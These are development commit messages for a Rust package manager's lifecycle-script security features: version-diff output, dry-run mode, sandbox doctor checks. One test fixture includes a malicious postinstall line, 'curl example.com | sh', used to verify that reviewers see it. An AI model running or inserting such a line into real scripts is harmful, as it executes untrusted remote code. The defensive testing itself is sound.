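A small sketch of the two wire-shape rules, using kebab-case reason strings and the `null` vs `[]` distinction. The enum and function names are assumptions, and the JSON is built by hand to keep the sketch std-only; the real code uses `serde_json`. Tag names are assumed to be plain identifiers that need no escaping.

```rust
#[derive(Debug, Clone, Copy)]
enum VersionDiffReason {
    NoChange,
    ScriptHashDrift,
    BehavioralTagShift,
    ProvenanceDrift,
    MultiFieldDrift,
}

impl VersionDiffReason {
    /// Kebab-case wire string; agents match on these, so they are pinned.
    fn as_wire(self) -> &'static str {
        match self {
            VersionDiffReason::NoChange => "no-change",
            VersionDiffReason::ScriptHashDrift => "script-hash-drift",
            VersionDiffReason::BehavioralTagShift => "behavioral-tag-shift",
            VersionDiffReason::ProvenanceDrift => "provenance-drift",
            VersionDiffReason::MultiFieldDrift => "multi-field-drift",
        }
    }
}

/// `None` renders as `null` (tag dimension did not drift);
/// `Some(&[])` renders as `[]` (it drifted, but not in this direction).
fn tags_to_json(tags: Option<&[&str]>) -> String {
    match tags {
        None => "null".to_string(),
        Some(list) => {
            let quoted: Vec<String> = list.iter().map(|t| format!("\"{t}\"")).collect();
            format!("[{}]", quoted.join(","))
        }
    }
}
```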

## Consolidated entry helper

Pre-Chunk-4: per-entry shape was an inline `serde_json::json!{...}`
literal in three places (approve_builds.rs `blocked_to_json`, two
sites in install.rs). Chunk 4 moves the canonical shape into a
single `version_diff::blocked_to_json(blocked, &trusted)` and
delegates from each call site:

- approve_builds.rs's existing private `blocked_to_json` becomes a
  thin wrapper that calls the shared helper. All four call sites
  (`print_listing`, `print_summary` × 4 paths) thread `&trusted`.
- Both install.rs sites (`run_with_options` + the lockfile fast-path)
  call the shared helper directly. They read `&trusted` from the
  manifest via the C2 `read_trusted_deps_from_manifest` helper —
  graceful degradation: when the manifest is missing/malformed,
  `unwrap_or_default()` produces an empty Legacy variant and every
  entry's `version_diff` is `null` (which is what an empty
  `trustedDependencies` should produce anyway).

Future schema additions to the per-entry shape (P8's `approved_by`
on the binding will surface here) edit ONE site instead of three.

## print_summary signature change

`fn print_summary(... &trusted, ...)` — adds a `&TrustedDependencies`
parameter so the per-entry helper can compute version_diff for the
approved/skipped lists in --yes/interactive output. Note: this fires
post-`write_back`, so `trusted` includes the freshly-added binding
for `name@candidate_version`. The `latest_binding_for_name` selector
is strictly-less-than the candidate, so it skips the freshly-added
entry and reports the diff against the prior version — matches what
the user saw when reviewing. Documented at the call site.
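
To illustrate why the strictly-less-than rule skips the freshly written binding, here is a simplified sketch. It models versions as `(major, minor, patch)` tuples and the function name is hypothetical; the real `latest_binding_for_name` works on full bindings and real semver.

```rust
/// Simplified version triple; the real selector compares semver values.
type Version = (u64, u64, u64);

/// Picks the highest approved version strictly below the candidate.
fn latest_binding_before(approved: &[Version], candidate: Version) -> Option<Version> {
    approved.iter().copied().filter(|v| *v < candidate).max()
}
```

After `write_back`, the approved set contains the candidate itself; because the comparison is strict, the selector still returns the prior version the user was shown during review.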

## SCHEMA_VERSION bump 2 → 3

The `SCHEMA_VERSION` constant in approve_builds.rs documents the
v3 addition + the bump rule. New `schema_version_bumped_for_version_diff`
const-assert pins the bump so a future revert can't silently
downgrade the version. Pre-v3 readers ignore the new field; v3+
readers branch on `schema_version >= 3` to know when to expect it.

The two existing CLI subprocess tests in
`approve_builds_audit_regression.rs` that assert `schema_version ==
Some(2)` are updated to `Some(3)` with a comment naming both bumps
(P2 Chunk 3 → 2, P7 Chunk 4 → 3) so future readers know the
history.
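
A minimal sketch of the const-assert pattern and the reader-side branch. The anonymous `const _` form and the `expects_version_diff` helper are assumptions for illustration; the commit only names `schema_version_bumped_for_version_diff`.

```rust
pub const SCHEMA_VERSION: u32 = 3;

// Compile-time pin: a revert below 3 fails the build instead of
// silently downgrading the wire contract.
const _: () = assert!(SCHEMA_VERSION >= 3, "version_diff requires schema v3+");

/// Reader-side rule: only v3+ envelopes are expected to carry `version_diff`.
fn expects_version_diff(schema_version: u32) -> bool {
    schema_version >= 3
}
```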

## Tests

15 new unit tests in `version_diff::tests`:
- Wire-form pinning: `version_diff_reason_wire_strings_are_kebab_case`,
  `provenance_drift_kind_wire_strings_are_kebab_case` — agents grep
  on these strings, so changing them is a wire break.
- Per-variant JSON shape: `version_diff_to_json_no_change_*`,
  `_script_hash_drift_alone`, `_behavioral_tag_shift_emits_arrays`,
  `_behavioral_tag_shift_only_gained_still_emits_empty_lost`,
  `_provenance_dropped`, `_provenance_identity_changed`,
  `_provenance_gained`, `_multi_field_emits_each_dimension`,
  `_multi_field_with_only_some_dimensions_nulls_others`.
- `blocked_to_json` integration: emits `null` when no prior binding;
  emits `no-change` object when prior matches; emits full diff when
  prior drifts.

Plus `schema_version_bumped_for_version_diff` const-assert.

## Local gate (touched crates)

```
cargo clippy -p lpm-workspace -p lpm-cli --all-targets -- -D warnings
# clean

cargo fmt --check
# clean

cargo test -p lpm-workspace -p lpm-cli
# 88 + 1573 + 78 = 1739 passed; 0 failed

cargo test -p lpm-security -p lpm-global -p lpm-resolver
# 657 passed; 0 failed (binding consumers unaffected)
```

End-to-end JSON shape proof under a real subprocess comes in C5's
reference fixture.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…both ship criteria

C5 lands the §11 P7 ship-criteria gate at the CLI level: end-to-end
subprocess proofs that both ship criteria fire under real fd
separation, real LpmRoot resolution, and the real
store/manifest/build-state read pipeline. Mirrors the P6 Chunk 5
reference-fixture pattern so future readers have one mental model
for "Phase 46 P-N reference fixture."

## Why approve-builds path (not install)

The C2 install render path can't be exercised end-to-end without a
real `lpm install` run (lockfile-validated integrity against a real
registry — same blocker the P6 fixture commentary documents). The
diff-rendering CONTRACT is identical between the install
pre-autobuild card and the approve-builds TUI card (both call
`render_preflight_card`); the C5 fixture exercises the contract
through `lpm approve-builds --list` (human + JSON). A passing
assertion on the approve-builds output proves the install path's
rendering at the exact byte level.

Pure-decision proofs of both ship criteria already exist:
- `version_diff::tests::preflight_card_*` (C2) — pure renderer.
- `commands::install::tests::p7_post_install_hints_*` (C2) —
  install enrichment decision.

C5 is the missing end-to-end subprocess proof: real binary, real
fd separation, real LpmRoot.

## Tests (6 added)

**Ship criterion 1 — script_hash drift surfaces the exact added line:**
- `p7_chunk5_script_hash_drift_surfaces_added_curl_pipe_in_approve_builds_list`
  Seeds shapeshift@1.0.0 (`echo hi`) + shapeshift@2.0.0
  (`echo hi\ncurl example.com | sh`). Approves v1's script_hash in
  trustedDependencies. Synthesizes build-state.json with v2 blocked
  + a different script_hash. Runs `lpm approve-builds --list` as a
  subprocess, asserts the diff card header (`shapeshift@2.0.0 —
  changes since v1.0.0:`) AND the literal `+curl example.com | sh`
  line surface in stdout. The literal-line assertion IS the ship
  criterion: the user sees the malicious line verbatim, not just
  "scripts changed."
- `p7_chunk5_script_hash_drift_emits_structured_version_diff_in_json`
  Same scenario, runs `--json`, asserts:
  - `schema_version: 3` (P7 Chunk 4 bump).
  - `version_diff.reason: "script-hash-drift"`.
  - `prior_version: "1.0.0"`, `candidate_version: "2.0.0"`.
  - `script_hash_drift: true`, other dimension fields null.

**Ship criterion 2 — behavioral_tag delta surfaces gained tags:**
- `p7_chunk5_behavioral_tag_drift_surfaces_gained_network_and_eval_in_card`
  Same script body on both sides (no script drift to mask the tag
  drift). Prior had only `crypto`; candidate has `crypto + eval +
  network`. Asserts `+ eval` and `+ network` both appear verbatim
  in the diff card. Negative pin: NO "Script content changed"
  header (the script bodies match, so a regression that emitted a
  spurious script section would fail this assertion).
- `p7_chunk5_behavioral_tag_drift_emits_gained_arrays_in_json`
  Same scenario with `--json`. Asserts:
  - `version_diff.reason: "behavioral-tag-shift"`.
  - `behavioral_tags_added: ["eval", "network"]` (sorted lex per
    `active_tag_names()`).
  - `behavioral_tags_removed: []` (NOT null — pins the C4 wire-
    shape distinction between "tag dimension drifted with no
    losses" (`[]`) and "tag dimension didn't drift" (`null`)).

**Stream-separation control:**
- `p7_chunk5_list_json_stays_parseable_with_version_diff_enrichment`
  Pins that stdout under `--json` is exactly one parseable JSON
  document, even when `version_diff` enrichment fires. If a
  regression accidentally routed `print_version_diff_card_for_blocked`'s
  `println!` through stdout in JSON mode, this parse fails with the
  offending shape printed for diagnosis. Mirrors the P6 Chunk 5
  stream-separation pin shape.

**No-prior-binding control:**
- `p7_chunk5_first_time_review_emits_null_version_diff_and_no_card`
  First-time review (no prior binding for the same package name)
  must NOT render a diff card and must emit `version_diff: null` in
  JSON. Pins the C1 contract that `latest_binding_for_name` returns
  None in this case, surfaced through both UX paths.

## Harness

Reuses the P6 Chunk 5 shape:
- `run_lpm` with `LPM_HOME` + `HOME` overrides isolating the test
  to a tempdir; `NO_COLOR` + `LPM_NO_UPDATE_CHECK` +
  `LPM_DISABLE_TELEMETRY` for deterministic output.
- `seed_package` writes synthetic store entries; uses
  `serde_json::Value::String` for postinstall-body JSON-escaping
  so multi-line bodies (the scenario A v2 case) escape correctly.
- New helpers (P7-specific):
  - `write_blocked_build_state` synthesizes a
    `<project>/.lpm/build-state.json` with one blocked entry,
    optional `behavioral_tags{,_hash}` fields. Stand-in for the
    install pipeline's capture writer (which the harness can't
    drive).
  - `write_project_with_prior_binding` writes a `package.json`
    with a `trustedDependencies` rich entry for the prior version,
    using the on-disk wire shape (`scriptHash`, `behavioralTagsHash`,
    `behavioralTags`) per `lpm-workspace::TrustedDependencyBinding`'s
    serde renames.

## Local gate (touched crates)

```
cargo clippy -p lpm-workspace -p lpm-cli --all-targets -- -D warnings
# clean

cargo fmt --check
# clean

cargo test -p lpm-cli --test p7_version_diff_reference
# 6 passed; 0 failed (real subprocess runs in ~1.9s)

cargo test -p lpm-cli -p lpm-workspace
# 1745 passed; 0 failed across 11 test binaries (88 + 1573 + 84
# in test bins including the 6 new in p7_version_diff_reference)
```

Full workspace gate deferred to C6.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
§5.1 specifies allow as "runs every lifecycle script without the
triage gate." Pre-fix, `build::run`'s default-branch selector
filtered `to_build` to `is_trusted`-only at build.rs:254 regardless
of policy, so allow behaved identically to deny at the CLI boundary
— a P1-era gap flagged by v2.8 item 6. The P6 Chunk 2 helper-level
test (p6_chunk2_allow_does_not_promote_green_tier_at_helper_level)
pinned that `evaluate_trust` stays single-purpose by design; the
caller-side half of that split had no guard.

Bug-first test landed first (confirmed pre-fix red: 2/4 subprocess
tests failed). The fix extracts `widen_to_build_by_policy` as a pure
helper so both the caller contract (Allow widens, Deny/Triage
filter) and the `--all` escape-hatch override are independently
unit-testable.

Changes:

- `widen_to_build_by_policy(scriptable, all, effective_policy)` —
  pure helper encapsulating the default-branch widening rule:
  `all || policy == Allow` → every scriptable package; else →
  filter to `is_trusted`. Triage's green-only promotion stays
  gated at `evaluate_trust` (P6 Chunk 2 contract preserved).
- `build::run` default branch delegates to the helper. Specific-
  package path (with its warn-on-missing side effect) stays inline.
- Both skipped-count warning sites gain `effective_policy != Allow`
  guards — "will be skipped" + trustedDependencies pointer is
  misdirection under allow because the widening folds every
  scripted package into the build set.
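
The widening rule is small enough to sketch in full. The type names and the `is_trusted` field are assumptions standing in for the real `scriptable` entries; only the `all || policy == Allow` rule is taken from the description above.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum ScriptPolicy {
    Deny,
    Allow,
    Triage,
}

/// Illustrative stand-in for a package that has lifecycle scripts.
#[derive(Debug, Clone, PartialEq, Eq)]
struct ScriptablePackage {
    name: String,
    is_trusted: bool,
}

/// `all || policy == Allow` keeps every scriptable package;
/// otherwise only trusted packages stay in the build set.
fn widen_to_build_by_policy(
    scriptable: &[ScriptablePackage],
    all: bool,
    policy: ScriptPolicy,
) -> Vec<ScriptablePackage> {
    if all || policy == ScriptPolicy::Allow {
        scriptable.to_vec()
    } else {
        scriptable.iter().filter(|p| p.is_trusted).cloned().collect()
    }
}
```

Triage takes the filtering branch here on purpose: green-tier promotion is assumed to have already been reflected in `is_trusted` by the time the helper runs, matching the `evaluate_trust` split.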

Tests (bug-first, confirmed red pre-fix, green post-fix):

- 4 subprocess tests in `p46_close_allow_widening_reference.rs`:
  project-manifest allow widens every tier; CLI override
  (`--policy=allow` + `--yolo` alias) also widens; deny keeps
  trusted-only filter + legacy pointer; triage does NOT widen
  beyond `evaluate_trust`-promoted greens (pins the allow-scoped
  boundary of the fix).
- 4 pure-function unit tests next to the P6 helper guards:
  Allow includes untrusted; Deny filters to trusted; Triage
  filters to trusted (green promotion was already applied by
  the time scriptable_packages reached the helper); `--all`
  widens under every policy.

Gates passing:
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_allow_widening_reference: 4/4 pass
- commands::build::tests: 49/49 pass (4 new + 45 pre-existing;
  includes all P6 Chunk 1/2/3 tests)
- p6_triage_autoexec_reference: 5/5 pass (no regression)
- p7_version_diff_reference: 6/6 pass (no regression)

Install auto-build path composes correctly: install.rs calls
build::run with `all=false` and a resolved `effective_policy`;
under `scriptPolicy=allow + autoBuild=true`, the new helper widens
to every scripted package, matching §5.1's autoBuild+allow row.

Closes §5.1's "Partially shipped as of P6 (v2.8)" — flip to fully
shipped happens in the Chunk 6 plan-doc close-out pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Reviewer flagged during Chunk 2 signoff that the shipped behavior no
longer matched the --help text in `lpm install` and `lpm build`:

- `--policy` (both commands) said "all three values currently behave
  identically to --policy=deny" — stale since P6 shipped tier-aware
  auto-execution for triage and Chunk 2 shipped allow-widening for
  `lpm build`.
- `--yolo` said "currently a no-op that only logs the chosen policy"
  — stale since Chunk 2.
- `--triage` said "currently a no-op" — stale since P6.

After this chunk's selection-step widening, `build --policy=allow` /
`--yolo` change execution selection, and `install` with
`autoBuild=true` inherits that through `build::run`. The help text
was user-visible contract drift on the binary's own --help output.

Rewrites both sites to describe shipped behavior:

- install --policy: enumerates deny/allow/triage with current
  semantics, names the two-phase invariant (install never runs
  scripts; policy governs auto-build + subsequent `lpm build`),
  notes Layer 4 (LLM triage) ships in 46.1.
- install --yolo: alias for --policy=allow, auto-build + `lpm build`
  run every scripted package without tier gating.
- install --triage: alias for --policy=triage, tiered gate with
  greens auto-approved in sandbox.
- build --policy: enumerates deny/allow/triage at the selection
  step specifically; notes `--all` overrides every policy.
- build --yolo: includes every scripted package regardless of trust;
  equivalent to `--all` at the selection step.
- build --triage: greens auto-promoted into the build set.

Bullet lists use blank-line paragraph breaks (`///` between each)
so clap's help reformatter renders them as paragraphs, not a
run-on line. Confirmed by inspecting
`lpm install --help` / `lpm build --help` output post-rebuild.

Gates passing:
- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_allow_widening_reference: 4/4 pass (no regression)

Doc-only change; no behavior change.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Preview decisions without mutating persisted state. §11 P9 close-out
scope item per v2.10. Covers project + global surfaces explicitly per
the Chunk 3 signoff — project-mode byte-equality of `package.json`
alone would have missed the `--global` aggregate path.

## Surface

New `--dry-run` flag on `lpm approve-builds`. Combines with `--yes`,
`<pkg>`, the interactive walk, and with `--global` / `--json`. No-op
when combined with `--list` (already read-only — accepted silently
per signoff). JSON envelopes carry `"dry_run": true` so agents can
distinguish preview from live runs at parse time; human output
reframes "X approved" as "would approve X — no changes written" and
drops the `lpm build` next-step pointer.

## Mutation-site map

Project mode (`run`) — 3 write_back call sites:
- Line 289 (direct <pkg> approve, after confirm)
- Line 372 (--yes bulk)
- Line 547 (interactive walk, post-loop atomic write)

Global mode — 5 write_for call sites across 3 helpers:
- run_global_bulk_yes — 1 site (bulk aggregate write)
- run_global_named — 1 site
- run_global_interactive — 3 sites (grouped approve-all, grouped per-row,
  non-grouped per-row)

Every site gains `if !dry_run { … }` around the mutation. Decision
accounting (approved / skipped vectors) still populates so the
summary surfaces the would-approve counts identically to a live run.
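
The guard pattern can be sketched as follows, with an in-memory `Vec` standing in for the persisted trust state. The function name and the state representation are assumptions; the real sites wrap `write_back` / `write_for` calls.

```rust
/// Approves every pending package. Decision accounting always runs;
/// the mutation of `trusted` is skipped under `dry_run`.
fn approve_all(pending: &[&str], trusted: &mut Vec<String>, dry_run: bool) -> Vec<String> {
    // Populated in both modes so the summary shows would-approve counts.
    let approved: Vec<String> = pending.iter().map(|name| name.to_string()).collect();

    if !dry_run {
        // Stand-in for the persisted write.
        trusted.extend(approved.iter().cloned());
    }
    approved
}
```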

## Signature changes

- `run(project_dir, package, yes, list, dry_run, json_output)` —
  new `dry_run` bool between `list` and `json_output`.
- `run_global(package, yes, list, group, dry_run, json_output)` —
  new `dry_run` bool.
- Internal helpers (`run_global_bulk_yes`, `run_global_named`,
  `run_global_interactive`) gain matching `dry_run` parameter.
- `print_summary` gains `dry_run` bool before `json_output`;
  `#[allow(clippy::too_many_arguments)]` added with rationale
  (wrapper struct would hurt readability more than 8 positional
  args; fold only if a second command-level surface starts
  consuming the same shape).

14 internal test-module call sites updated to pass `false` for the
new `dry_run` slot.

## Tests (6 new subprocess tests)

`crates/lpm-cli/tests/p46_close_dry_run_reference.rs`:

1. Project `--yes --dry-run --json`: `package.json` byte-equal
   before/after; JSON has `"dry_run": true`; warning message
   reframed as "DRY RUN — would blanket-approve…".
2. Project `<pkg> --dry-run --json`: `package.json` byte-equal;
   JSON has `"dry_run": true`.
3. Project `--list --dry-run`: silent no-op — succeeds, no mutation.
4. Global `--yes --global --dry-run --json`: trust file stays
   ABSENT on fresh fixture; JSON envelope has `"dry_run": true`,
   `"scope": "global"`, warning reframed.
5. Global `<pkg>@<ver> --global --dry-run --json`: trust file
   stays absent; matched package identity surfaces in `approved`
   array for agent visibility.
6. Global `<pkg> --dry-run` against pre-seeded trust file:
   byte-equal preserved — proves the short-circuit protects
   existing state as well as fresh.

Fixture shapes for global mode hand-write `manifest.toml` (one
top-level install) + per-install `build-state.json` (one blocked
package). Matches the on-disk shape `lpm_global::write_for`
produces.

## Legacy-upgrade warning suppressed under dry-run

`print_summary`'s JSON `"legacy_upgraded_to_rich"` warning fires
when a legacy array-form `trustedDependencies` would have been
rewritten as the rich map form. Under `--dry-run`, no write
happens — the legacy array stays on disk. Surfacing "upgraded"
would lie, so the warning suppresses. Live-run behavior unchanged.

## Gates

- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_dry_run_reference: 6/6
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)
- approve_builds::tests (unit): 73/73
- approve_builds_audit_regression: 6/6 (no regression)

100 total tests across the Phase 46 + approve-builds surface, green.

## Non-goals

- Interactive walk subprocess tests. Both project and global
  interactive paths require a TTY; subprocess harness can't
  provide one. Source-level audit of the 3 write sites inside
  `run_global_interactive` + existing `approve_builds_yes_*`
  unit-test coverage + the human-output DRY RUN messaging
  together pin the contract.
- Empty-aggregate and --list JSON envelopes do NOT carry
  `dry_run`. Those paths are structurally read-only; adding
  the field would tell agents something redundant. Principle
  of least surprise: passing a redundant flag shouldn't change
  the output schema.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Reviewer flagged during Chunk 3 signoff that the help text + command-
level doc comments promised "JSON envelopes carry `"dry_run": true`
so agents can detect the mode" — but `--list` paths and empty-set
short-circuits emitted envelopes without the field. An agent
invoking `approve-builds --list --dry-run --json` or
`approve-builds --dry-run --json` on an empty set couldn't detect
dry-run from the envelope, contrary to the stated contract.

Picked Option 2 from the reviewer's two paths: make the
implementation universal rather than narrow the help text. Agents
read `envelope.dry_run` without branching on mode; schema stays
uniform across every approve-builds JSON surface.

Sites updated (four emission points that produce JSON envelopes):

- `run()` empty-set short-circuit at approve_builds.rs — inline
  `serde_json::json!` literal gains `"dry_run": dry_run`.
- `print_listing()` — gains `dry_run: bool` parameter, threaded
  from `run()`'s caller. Envelope gains the field.
- `run_global()` empty-aggregate short-circuit — gains
  `"dry_run": dry_run`.
- `print_global_list()` — gains `dry_run: bool` parameter, threaded
  from `run_global()`'s caller. Envelope gains the field.
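
The uniform contract can be sketched as a single envelope builder that every mode goes through. This is an illustration under assumptions: the `mode` and `blocked` field names and the hand-rolled JSON are hypothetical (the real sites use `serde_json::json!`), and no string escaping is attempted.

```rust
/// Hypothetical envelope builder. Hand-rolled JSON keeps the sketch
/// std-only; it does not escape strings and is for illustration only.
/// The point: `dry_run` is emitted for every mode, never conditionally.
fn envelope(mode: &str, dry_run: bool, blocked: &[&str]) -> String {
    let items: Vec<String> = blocked.iter().map(|p| format!("\"{p}\"")).collect();
    format!(
        "{{\"mode\":\"{mode}\",\"dry_run\":{dry_run},\"blocked\":[{}]}}",
        items.join(",")
    )
}
```

Because the field is unconditional, an agent can read `dry_run` from a `--list` envelope or an empty-set envelope without branching on mode.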

One unit test updated: `print_global_list_handles_empty_aggregate_without_panicking`
now exercises the new parameter axis in its smoke-test shape.

## Tests (2 new subprocess + 1 upgraded)

- `p46_close_chunk3_project_list_dry_run_is_silent_no_op` upgraded:
  was exit-code-and-byte-equal-only; now also asserts
  `dry_run: false` on plain `--list --json` (baseline) and
  `dry_run: true` on `--list --dry-run --json`, proving the
  universal contract on the read-only path.
- `p46_close_chunk3_project_empty_blocked_set_json_carries_dry_run_flag`:
  exercises the empty-set short-circuit (both `--yes` and
  `--yes --dry-run` paths emit the flag).
- `p46_close_chunk3_global_list_json_carries_dry_run_flag_on_both_axes`:
  mirror for the global `--list` envelope via `print_global_list`.

## Gates

- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- p46_close_dry_run_reference: 8/8 (was 6/6 pre-fix)
- approve_builds::tests (unit): 73/73 (no regression)
- approve_builds_audit_regression: 6/6 (no regression)
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)

102 tests across the approve-builds + Phase 46 surface — one
uniform contract for agents.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…e boundary

§11 P9 close-out scope item per v2.10. Surfaces the 46.0 platform
boundaries through the existing doctor harness so users see the
sandbox-availability status and the project-only scope limit
alongside other infrastructure checks.

## New checks

### 18. Sandbox availability probe (`Sandbox`)

Constructs a synthetic SandboxSpec and calls
`lpm_sandbox::new_for_platform(spec, SandboxMode::Enforce)`. Both
backends' `new()` are memory-only (macOS Seatbelt renders an
in-memory profile string; Linux landlock does one benign
ruleset-create syscall to probe ABI), so the check costs nothing
in persistent I/O and never races with running installs.

Outcome map:
- macOS / Linux (kernel >= 5.13) → `pass` — backend name + platform
  in detail (e.g., "seatbelt available on macos — lifecycle scripts
  run under Enforce mode")
- Windows → `warn` with the §17.4 Phase 46.1 deferral pointer.
  Scripts still run today via `--unsafe-full-env --no-sandbox`, but
  `script-policy = "triage"` / `"allow"` opts out of the sandbox
  floor on Windows until 46.1 — users need to know.
- Linux with kernel < 5.13 → `warn` with kernel version +
  landlock requirement + upgrade remediation.
- Unexpected errors → `fail` with diagnostic detail. Shouldn't
  happen; the synthetic spec is well-formed.
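
The outcome map above can be written as one `match`. A minimal sketch, assuming hypothetical names (`Status`, `sandbox_status`) and a pre-parsed kernel version; the real probe calls `lpm_sandbox::new_for_platform` rather than inspecting the OS name:

```rust
/// Doctor-style outcome levels (hypothetical mirror of the check statuses).
#[derive(Debug, PartialEq)]
enum Status {
    Pass,
    Warn,
    Fail,
}

/// Hypothetical classifier over (OS name, Linux kernel major/minor).
/// It only reproduces the outcome table, not the actual backend probe.
fn sandbox_status(os: &str, linux_kernel: Option<(u32, u32)>) -> Status {
    match (os, linux_kernel) {
        ("macos", _) => Status::Pass,
        // Landlock needs kernel 5.13 or newer; tuple comparison is lexicographic.
        ("linux", Some(v)) if v >= (5, 13) => Status::Pass,
        ("linux", Some(_)) => Status::Warn,
        ("windows", _) => Status::Warn,
        // Anything else (assumed here to include an unreadable kernel
        // version) is treated as the unexpected-error arm.
        _ => Status::Fail,
    }
}
```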

### 19. Scope-boundary note (`Script policy scope`)

Informational `pass` surfaced iff the global manifest carries at
least one active install. The 46.0 script-policy surface covers
project installs only; `lpm install -g` uses a separate Phase 37
trust store that 46.1 brings into the tiered-gate + sandbox fold
per D19. Users without global installs don't see the note
(avoids noise); users with globals see the forward pointer so
the capability gap is explicit, not latent.

## Wiring

Placed after the global-installs block (checks #14-17) in
`doctor::run`, so the scope-boundary note sits visually next to
the Phase 37 rows it contextualizes. Follows the existing
`check_global_installs() -> Vec<Check>` aggregator pattern:
`check_script_policy_surface() -> Vec<Check>` composes
`probe_sandbox_backend()` (unconditional) + a conditional
`scope_boundary_note_if_globals_present(root)` (only on
non-empty globals).

Split into three functions so each is independently testable
without running the whole `doctor::run` pipeline — matches how
the P6 close-out helpers were extracted.
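
The composition described above, sketched with a simplified `Check` type. Assumptions: the struct fields are hypothetical, and the scope note takes a count of active global installs instead of the real `root` argument.

```rust
/// Hypothetical, simplified `Check` row; the real doctor type differs.
#[derive(Debug, Clone, PartialEq)]
struct Check {
    name: &'static str,
    detail: String,
}

/// Unconditional: the sandbox probe always yields a row.
fn probe_sandbox_backend() -> Check {
    Check {
        name: "Sandbox",
        detail: format!("probe ran on {}", std::env::consts::OS),
    }
}

/// Conditional: only emitted when at least one global install is active.
/// (A count stands in for the LPM root the real function receives.)
fn scope_boundary_note_if_globals_present(active_globals: usize) -> Option<Check> {
    (active_globals > 0).then(|| Check {
        name: "Script policy scope",
        detail: "project installs only".to_string(),
    })
}

fn check_script_policy_surface(active_globals: usize) -> Vec<Check> {
    // Probe first, so it can never end up gated behind the globals check.
    let mut checks = vec![probe_sandbox_backend()];
    // `Option` is iterable: zero or one extra row.
    checks.extend(scope_boundary_note_if_globals_present(active_globals));
    checks
}
```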

## Tests (7 new unit tests in commands::doctor::tests, 5 active per platform)

- `sandbox_probe_always_returns_a_check`: universal smoke — the
  probe must never panic, always emits a named `Check` with a
  non-empty detail line regardless of platform.
- `sandbox_probe_on_macos_passes_with_seatbelt_backend`
  (`#[cfg(target_os = "macos")]`): macOS runners must Pass and
  the detail must name `seatbelt` for user debuggability.
- `sandbox_probe_on_linux_passes_or_warns_never_fails`
  (`#[cfg(target_os = "linux")]`): Linux must be Pass (landlock
  present) or Warn (kernel too old), never Fail. CI runners with
  recent kernels hit the Pass arm; older boxes would hit Warn
  but the test passes either way — the contract is "no Fail on
  a supported platform."
- `sandbox_probe_on_windows_warns_with_phase_46_1_pointer`
  (`#[cfg(target_os = "windows")]`): Windows must Warn with the
  §17.4 46.1 message present in the detail.
- `scope_boundary_note_is_absent_when_no_global_installs`:
  fresh synthetic `LpmRoot` returns None.
- `scope_boundary_note_fires_when_global_installs_exist`:
  seeded `manifest.toml` with one active install returns
  Some(Check), with "Phase 46.1" and "project installs only"
  in the detail.
- `check_script_policy_surface_always_includes_sandbox_probe`:
  aggregator contract — sandbox probe always first, so a
  future refactor can't accidentally gate it behind a
  globals-exist check.

Per CLAUDE.md cross-platform rules: Linux + Windows test bodies
are `#[cfg]`-gated so they don't compile as dead code on the
other platforms' CI runners. macOS CI runs 5 tests (universal +
macOS-gated + 3 universal scope/aggregator); Linux runs 5
(universal + Linux-gated + 3); Windows runs 5 (universal +
Windows-gated + 3).

## Gates

- cargo clippy --workspace --all-targets -- -D warnings (clean)
- cargo fmt --check (clean)
- commands::doctor::tests: 70/70 (65 pre-existing + 5 new
  active on macOS)
- p46_close_dry_run_reference: 8/8 (no regression)
- p46_close_allow_widening_reference: 4/4 (no regression)
- p6_triage_autoexec_reference: 5/5 (no regression)
- p7_version_diff_reference: 6/6 (no regression)

Verified live `lpm doctor` output on developer machine (macOS
with global installs):

  ✔ Sandbox    seatbelt available on macos — lifecycle scripts run under Enforce mode
  ✔ Script policy scope    project installs only — global installs use a separate trust store at ~/.lpm/global/trusted-dependencies.json; Phase 46.1 extends the tiered gate + sandbox containment to globals

## Non-goals (deferred to 46.1 per v2.10 P9 trim)

- LLM detection doctor entry. Pairs with P8 Layer 4.
- Triage / policy config validation check (flagging typos in
  `package.json > lpm > scriptPolicy`). The install-time warning
  path at main.rs already surfaces typos; a second doctor-level
  check would be redundant until the user actually runs the
  command. Queue if users report hitting the gap.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…line snapshot

§11 P9 close-out scope item per v2.10. Two separate pieces per the
Chunk 5 signoff — wall-clock benchmarking on the 51-pkg fixture,
subprocess golden snapshot on a 2-pkg deterministic fixture.

## bench_cold_install_triage (bench/run.sh)

Reuses the existing 51-pkg fixture (17 direct deps resolving to 51
packages). Two axes against the deny baseline, matching amended
§12.7:

- Axis 1 (autoBuild off) — classification-only overhead. Measures
  P1 metadata plumbing + P2 static-gate classification cost during
  install timeline, scripts dormant. Target: ≤5% regression vs
  deny on the same fixture.
- Axis 2 (autoBuild on) — execution-path overhead. Measures P5
  sandbox spawn + P6 tier-aware auto-execution on green-classified
  scripted packages. Target: ≤15% regression vs deny on the same
  fixture.

Uses the existing `median_ms_ab_with_setup` helper with alternating
A/B run order per iteration so CDN / kernel-cache state can't
bias a single arm. Output includes a per-axis delta with the
target threshold inline for eyeball triage.

`format_delta` helper added for the percentage math (integer
bash arithmetic to whole-percent granularity — sufficient signal
at the wall-clock variance install benches show). Smoke-tested
in isolation: 100→105 = 5%, 100→120 = 20%, 100→95 = -5%, 0→100 =
"baseline 0ms — cannot compute delta" guard.

Wired into dispatch + `all` group + usage message. The
`workflow_dispatch` bench job in CI picks up the new arm
automatically via the `all` expansion.
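
For reference, the whole-percent math behind `format_delta` can be sketched in Rust (the harness itself is bash). The function name `percent_delta` and the `Option` return are assumptions for illustration; the zero-baseline guard is modeled as `None` instead of a message string.

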